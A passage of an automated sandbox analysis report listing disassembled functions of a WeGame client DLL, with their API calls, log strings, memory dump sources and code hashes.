                                        • Instruction Fuzzy Hash: D341BC317052058FDB089F6AC59876CBBF5BF45329F054269ED6AC7B90DF78DA00CA90
                                        Function 6C12BFDA Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 339stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12BFE4
                                        • GetPrivateProfileStringW.KERNEL32(setting,extra_cmd,6C3411A4,?,?,00000000), ref: 6C12C0B4
                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 6C12C118
                                        • StrStrIA.SHLWAPI(?,--proxy-server,?,?,?,?,?,00000038), ref: 6C12C16E
                                          • Part of subcall function 6C0DB791: __EH_prolog3.LIBCMT ref: 6C0DB798
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000003,00000001), ref: 6C12C3F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ??1?$basic_ios@D@std@@@std@@H_prolog3H_prolog3_PrivateProfileStringU?$char_traits@strlen
                                        • String ID: --proxy-auth$--proxy-server$extra_cmd$setting
                                        • API String ID: 4072278087-1349600155
                                        • Opcode ID: 28e3962ec56c72754d6fa657f7a1186774c99cd86f63eb925e46a2ee2535caf0
                                        • Instruction ID: 1a4d569ef1a26b7c00d9d0a8365d78ed1190d2ca33b1b7210df028d3ac26a6f5
                                        • Opcode Fuzzy Hash: 28e3962ec56c72754d6fa657f7a1186774c99cd86f63eb925e46a2ee2535caf0
                                        • Instruction Fuzzy Hash: 7EE18A71D04258DFEF14DBE8C854BDDBBB8AF15304F24409EE109A7681DB74AA88CF62
                                        Function 6C0F3F7E Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 248threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0F3F88
                                        • ?gen_seq_num@@YAGXZ.COMMON(00000090,6C0F185C,?,?,?,?,00000001,?,?,?,?,?,00000004), ref: 6C0F3FB4
                                          • Part of subcall function 6C0F2BF6: __EH_prolog3.LIBCMT ref: 6C0F2BFD
                                        • GetTickCount.KERNEL32 ref: 6C0F40CF
                                        • GetTickCount.KERNEL32 ref: 6C0F411D
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0F412C
                                        • GetTickCount.KERNEL32 ref: 6C0F4198
                                        • _Copy_construct_from.LIBCPMT ref: 6C0F41E4
                                        • _Copy_construct_from.LIBCPMT ref: 6C0F422F
                                        • ?PostMainThreadTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@V?$shared_ptr@X@4@@Z.COMMON(?), ref: 6C0F428E
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • post_msg_js_func send_broadcastto js:%s, execute_time:%u, xrefs: 6C0F4174
                                        • d:\ci_dev\wegame_client\codes\common\src\comm_center.cpp, xrefs: 6C0F4154
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CountTick$Copy_construct_fromH_prolog3$?gen_seq_num@@?get_log_instance@base@@H_prolog3_H_prolog3_catch_Logger@1@MainPostTask@common@ierd_tgp@@ThreadV?$function@$$V?$shared_ptr@X@4@@Z@std@@
                                        • String ID: post_msg_js_func send_broadcastto js:%s, execute_time:%u$d:\ci_dev\wegame_client\codes\common\src\comm_center.cpp
                                        • API String ID: 2937546168-1500875528
                                        • Opcode ID: 8a4846357d9c3d6460790c20b82c6092e54240ea796bf728fc5aba79cff1eb23
                                        • Instruction ID: 22cc39c7eaaed1b9e394468aad3e9d3f460b30f8f5f72f086418cc57fdfb2bbc
                                        • Opcode Fuzzy Hash: 8a4846357d9c3d6460790c20b82c6092e54240ea796bf728fc5aba79cff1eb23
                                        • Instruction Fuzzy Hash: B7B19B70905248DBDF15DFA4C984BDDBBF4AF49308F24809DD859A7742DB30AA89CFA1
                                        Function 6C0F2D4B Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 243COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0F2D55
                                        • _Copy_construct_from.LIBCPMT ref: 6C0F2DC6
                                        • memset.VCRUNTIME140(?,00000000,00000080), ref: 6C0F2E80
                                        • _itoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000080,0000000A,?,00000000,00000080), ref: 6C0F2E96
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0F2EDB
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0F2FFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$Copy_construct_fromH_prolog3__itoa_smemset
                                        • String ID: comm_center.on_process_msg$d:\ci_dev\wegame_client\codes\common\src\comm_center.cpp$send_broadcast to js:%d$send_broadcast to lua:%s$sss
                                        • API String ID: 2982741695-3257472537
                                        • Opcode ID: c59a582ca25413ab4e6461218b47546a84b3f10dc498a0534d9cd0f50964ab3b
                                        • Instruction ID: 3aea6e24f20e3e25e3764bdc66683d0c7c0a14c10c5e3e25579e4f26b142da19
                                        • Opcode Fuzzy Hash: c59a582ca25413ab4e6461218b47546a84b3f10dc498a0534d9cd0f50964ab3b
                                        • Instruction Fuzzy Hash: 0191C531A01255EFDF14DB64C894FDDB3F5AF44308F1440E8E859ABA81DB35AE89CBA1
                                        Function 6C10A54C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10A556
                                          • Part of subcall function 6C10A34B: __EH_prolog3_GS.LIBCMT ref: 6C10A355
                                          • Part of subcall function 6C10A34B: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,00000140,6C10A5BC,?,?,?,000000A8,6C10A8E7,?,?,?), ref: 6C10A422
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C10A5C7
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,00000001), ref: 6C10A63E
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 6C10A654
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C10A65E
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp,00000081,6C3CE62F), ref: 6C10A6A3
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C10A73D
                                        Strings
                                        • [ExptFileProcesser] Dispose now, key = %s, xrefs: 6C10A60B
                                        • [ExptFileProcesser] Dispose create key fail, id=%u, xrefs: 6C10A77E
                                        • d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp, xrefs: 6C10A5E8, 6C10A68A, 6C10A761
                                        • [ExptFileProcesser] Dispose create directory path = %s, failed(%d), xrefs: 6C10A6B6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$D@std@@H_prolog3_U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@std@@$?u16to8@common@ierd_tgp@@?u8to16@common@ierd_tgp@@CreateD@2@@4@@D@2@@std@@DirectoryErrorH_prolog3H_prolog3_catch_LastW@2@@4@@W@2@@std@@
                                        • String ID: [ExptFileProcesser] Dispose create directory path = %s, failed(%d)$[ExptFileProcesser] Dispose create key fail, id=%u$[ExptFileProcesser] Dispose now, key = %s$d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp
                                        • API String ID: 1456112532-392151656
                                        • Opcode ID: 9520296e860953bf0730222001234027d8f57924f29630fe85b5cb420a90f5b3
                                        • Instruction ID: b79e7248db7a394fa4efd23baadae0fa27757abd6cf61fa81f04427302d34c39
                                        • Opcode Fuzzy Hash: 9520296e860953bf0730222001234027d8f57924f29630fe85b5cb420a90f5b3
                                        • Instruction Fuzzy Hash: E9717C71E01208EFDB10DFA4CC55BDEBBB8AF19304F104099E505BB681EB75AA49CFA1
                                        Function 6C10A9E8 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 173COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C10A9F2
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(000000B0,6C10A705,?,?,?), ref: 6C10AA27
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000003), ref: 6C10AB3C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003), ref: 6C10AB43
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp,000001F9,6C3CE62F), ref: 6C10AB80
                                        • ?remove@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,00000005), ref: 6C10ABEF
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • [ExptFileProcesser] DumpDataFiles: data_path = %s, failed(%d), xrefs: 6C10AB93
                                        • d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp, xrefs: 6C10AA4B, 6C10AB67
                                        • will, xrefs: 6C10AA7D, 6C10AA91
                                        • [ExptFileProcesser] DumpDataFiles: Copying %d files to %s, %s delete after copy, xrefs: 6C10AA94
                                        • will not, xrefs: 6C10AA89
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$?remove@filesystem@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@ErrorH_prolog3H_prolog3_catch_LastU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_Vpath@12@@W@2@@std@@W@std@@
                                        • String ID: [ExptFileProcesser] DumpDataFiles: data_path = %s, failed(%d)$[ExptFileProcesser] DumpDataFiles: Copying %d files to %s, %s delete after copy$d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp$will$will not
                                        • API String ID: 1176421602-3354156754
                                        • Opcode ID: 9f8258ce156fdf8d90dd8497c3128763f2655dd4682ce4b992bf27fad1b5f9ec
                                        • Instruction ID: 938fd014012342bdad60f9aa03ff0e640e3e0a0ea931c4e5fc792071710bab21
                                        • Opcode Fuzzy Hash: 9f8258ce156fdf8d90dd8497c3128763f2655dd4682ce4b992bf27fad1b5f9ec
                                        • Instruction Fuzzy Hash: E5617A70A01248EFDB10DFA8C991BDDBBB5AF15308F20809DD544AB781DB35AE49CF92
                                        Function 6C13620B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 155COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C136215
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003,00000001,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?,?,?,00000002,?,00000000,00000001), ref: 6C136267
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,00000000,00000003,00000001,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?,?,?,00000002), ref: 6C1362FE
                                        • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(?,?,00000001,?,?,00000000,00000003,00000001,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?), ref: 6C136359
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C136376
                                          • Part of subcall function 6C132903: __EH_prolog3_GS.LIBCMT ref: 6C13290D
                                          • Part of subcall function 6C132903: memset.VCRUNTIME140(?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?,?,?,00000002), ref: 6C132923
                                          • Part of subcall function 6C132903: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?), ref: 6C132933
                                          • Part of subcall function 6C132903: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9,00000001,00000001,?), ref: 6C132941
                                          • Part of subcall function 6C132903: memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6C13622B,00000118,6C1359C9), ref: 6C13294F
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000000,00000003,00000001,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?,?,?,00000002), ref: 6C136396
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?,?,?,00000002,?,00000000,00000001,?,0000007C), ref: 6C1363A0
                                        • Concurrency::details::platform::__RegisterWaitForSingleObject.LIBCONCRT(?,?,00000001,00000118,6C1359C9,00000001,00000001,?,00000000,00000001,?,?,?,00000002,?,00000000), ref: 6C136404
                                          • Part of subcall function 6C0C61B6: ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,B33B76E5,?), ref: 6C0C620D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset$?get_log_instance@base@@D@std@@@std@@Logger@1@U?$char_traits@$??1?$basic_ios@Concurrency::details::platform::__H_prolog3_ObjectRegisterSingleWait$??1?$basic_iostream@
                                        • String ID: cannot report qos by http$d:\ci_dev\wegame_client\codes\common\src\qos_command.cpp$handle is invalid, cannot report qos
                                        • API String ID: 123105886-869807392
                                        • Opcode ID: 0b73dd159aae6c64d6cdd1ebb6b4ab58211a781b30bbca19557fc826b7690f7d
                                        • Instruction ID: 6e3a238136998560639e8f2e337a25b08582619e31eac21ba95edcb2051a8409
                                        • Opcode Fuzzy Hash: 0b73dd159aae6c64d6cdd1ebb6b4ab58211a781b30bbca19557fc826b7690f7d
                                        • Instruction Fuzzy Hash: CE51CD30900209ABDB10DAA4CD55FDD77B4AF2170CF2040A8E159ABAC1EF75AA0DCB95
                                        Function 6C10A7C7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10A7D1
                                        • EnterCriticalSection.KERNEL32(?,00000094,6C10C8B4), ref: 6C10A7F9
                                        • ResetEvent.KERNEL32(?,?), ref: 6C10A815
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C10A820
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C10A838
                                        • EnterCriticalSection.KERNEL32(?), ref: 6C10A8F1
                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 6C10A949
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?), ref: 6C10A961
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • [TraceSystem] trace queue end, xrefs: 6C10A99C
                                        • d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp, xrefs: 6C10A85C, 6C10A985
                                        • [TraceSystem] now start trace queue, size=%u, xrefs: 6C10A886
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CriticalSection$?get_log_instance@base@@EnterLeaveLogger@1@$EventH_prolog3H_prolog3_H_prolog3_catch_Reset
                                        • String ID: [TraceSystem] now start trace queue, size=%u$[TraceSystem] trace queue end$d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp
                                        • API String ID: 1397785076-4201567289
                                        • Opcode ID: 687686c84469c0fff6444233a5fb143b113a92bcbfc46f26fcd3a4807f8446a7
                                        • Instruction ID: 1e7cb52b424eefd695b17c345b07c7234b72e98b07201bf86d0808f5a9d893b6
                                        • Opcode Fuzzy Hash: 687686c84469c0fff6444233a5fb143b113a92bcbfc46f26fcd3a4807f8446a7
                                        • Instruction Fuzzy Hash: CF517E71E01258DFDB11DBA4CD44BDDBBB4AF15308F144099D408B7681EB756F4ACBA2
                                        Function 6C12BD67 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12BD71
                                        • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,cfg_data.ini), ref: 6C12BDDF
                                        • memset.VCRUNTIME140(?,00000000,00000208), ref: 6C12BE19
                                        • GetPrivateProfileStringW.KERNEL32(qblink_path,platform_dir,QBBlinkTrial,?,00000104,00000000), ref: 6C12BE5C
                                        • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,?,?,?,?,?,?,?), ref: 6C12BF0E
                                          • Part of subcall function 6C0C712B: __EH_prolog3_GS.LIBCMT ref: 6C0C7132
                                          • Part of subcall function 6C0C712B: ?get_exe_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 6C0C714F
                                          • Part of subcall function 6C0C712B: ?gen_relative_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV34@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 6C0C7172
                                          • Part of subcall function 6C12B293: __EH_prolog3_GS.LIBCMT ref: 6C12B29A
                                          • Part of subcall function 6C0AA3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0B62D8,00000000,6C0B6649,00000003,B33B76E5,?,?,00000000,6C316604,000000FF,?,6C0B5B05,00000000), ref: 6C0AA3E5
                                        • __Init_thread_footer.LIBCMT ref: 6C12BFCE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$Application@common@ierd_tgp@@D@2@@std@@H_prolog3_$?get_app_sub_path@V45@@$?gen_relative_path@common@ierd_tgp@@?get_exe_path@D@2@@std@@0Init_thread_footerPrivateProfileStringV34@@_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: QBBlinkTrial$\qb_setting.ini$cfg_data.ini$platform_dir$qblink_path
                                        • API String ID: 219117645-3432556680
                                        • Opcode ID: 1cc3b8f212626db364d6e53ed6ca1e7ed96407da584e7c3c83b9cd6d0bf59be0
                                        • Instruction ID: 8058657f7f624b0d7e5a3213b0660eeb6498edd29d9edb9162cb8108f489e74c
                                        • Opcode Fuzzy Hash: 1cc3b8f212626db364d6e53ed6ca1e7ed96407da584e7c3c83b9cd6d0bf59be0
                                        • Instruction Fuzzy Hash: 8951B371D04258DECF24DFA4C888BDDB7B4AF15318F5002D9D009A7691DB396B8ACFA2
                                        Function 6C156D2C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 123registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C156D33
                                        • RegOpenKeyW.ADVAPI32(?,?,00000000), ref: 6C156D61
                                        • RegCreateKeyW.ADVAPI32(?,?,00000000), ref: 6C156D7D
                                        • GetLastError.KERNEL32 ref: 6C156D89
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C156D94
                                        • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000008), ref: 6C156E1D
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C156E2C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 6C156E90
                                        Strings
                                        • [Sys_wrapper]SetRegValue, set reg value failed, path:{}, value_name:{}, value:{}, error:{}, xrefs: 6C156E74
                                        • [Sys_wrapper]SetRegValue, open reg path failed, path:{}, error:{}, xrefs: 6C156DD9
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C156DC0, 6C156E50
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
